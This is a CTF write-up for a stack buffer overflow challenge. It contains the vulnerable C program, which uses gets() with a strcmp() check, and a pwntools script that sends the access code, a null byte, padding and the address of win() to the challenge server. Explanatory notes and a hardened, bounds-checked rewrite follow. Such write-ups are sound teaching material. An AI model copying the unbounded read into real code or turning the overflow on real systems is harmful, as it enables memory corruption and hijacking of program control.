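###### tags: `MetaCTF`

# buff 1

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void win() {
    system("/bin/cat flag.txt");
    exit(0);
}

void vuln() {
    char buf[48];
    puts("Enter the access code: ");
    gets(buf);  // unbounded read: input longer than buf overwrites the stack
    if (strcmp(buf, "Sup3rs3cr3tC0de") == 0) {  // comparison stops at the first null byte
        puts("Access granted!");
    } else {
        puts("Invalid auth.");
        exit(-1);
    }
}

int main() {
    setbuf(stdout, 0);
    setbuf(stdin, 0);
    setbuf(stderr, 0);
    vuln();
    return 0;
}
```

```python
from pwn import *

context.arch = 'amd64'
#p = process("./b0")
p = remote("host1.metaproblems.com", 5151)
# access code + null byte so strcmp() passes, 40 bytes of padding, then the address of win()
p.sendline(b"Sup3rs3cr3tC0de" + b"\x00" + b"a" * 40 + p64(0x401172))
p.interactive()
```

- Send the access code first, followed by a null byte, so that the `strcmp` check passes.
- Pad the rest: 48 (`buf`) + 8 (saved rbp) = 56 bytes; 56 - 15 (code) - 1 (null byte) = 40 bytes of padding.
- Use `objdump -d` to find the address of `win` and jump to it.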
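For comparison, a hardened counterpart of `vuln()`, added here as an example and not part of the original challenge or write-up. It bounds the read to `buf` and compares by exact length, so both overlong input and the "code + null byte + padding" input are rejected; the names `read_line_bounded`, `check_access`, `check_bytes`, `ACCESS_CODE` and `BUF_SIZE` are hypothetical.

```c
#include <stdio.h>
#include <string.h>

#define ACCESS_CODE "Sup3rs3cr3tC0de"   /* value from the challenge source */
#define BUF_SIZE 48                      /* same size as the original buf */

/* Hypothetical helper: reads one line from `in` into buf (capacity cap),
 * never writing past cap bytes. Returns the true line length in bytes,
 * counting embedded NULs and bytes that did not fit. */
static size_t read_line_bounded(FILE *in, char *buf, size_t cap) {
    size_t len = 0;
    int c;
    while ((c = fgetc(in)) != EOF && c != '\n') {
        if (len < cap)
            buf[len] = (char)c;   /* store only while there is room */
        len++;                    /* keep counting to detect overlong input */
    }
    return len;
}

/* Hardened counterpart of vuln(): returns 1 on access granted, 0 otherwise. */
int check_access(FILE *in) {
    char buf[BUF_SIZE];
    size_t want = strlen(ACCESS_CODE);
    size_t got = read_line_bounded(in, buf, sizeof buf);

    /* Length must match exactly: rejects overlong lines and "code\0junk",
     * which strcmp() would accept because it stops at the first NUL. */
    if (got != want)
        return 0;
    return memcmp(buf, ACCESS_CODE, want) == 0;
}

/* Feeds constructed bytes to check_access() through a temporary file. */
int check_bytes(const void *data, size_t n) {
    FILE *f = tmpfile();
    if (!f) return -1;
    if (fwrite(data, 1, n, f) != n) { fclose(f); return -1; }
    rewind(f);
    int r = check_access(f);
    fclose(f);
    return r;
}

int main(void) {
    puts(check_access(stdin) ? "Access granted!" : "Invalid auth.");
    return 0;
}
```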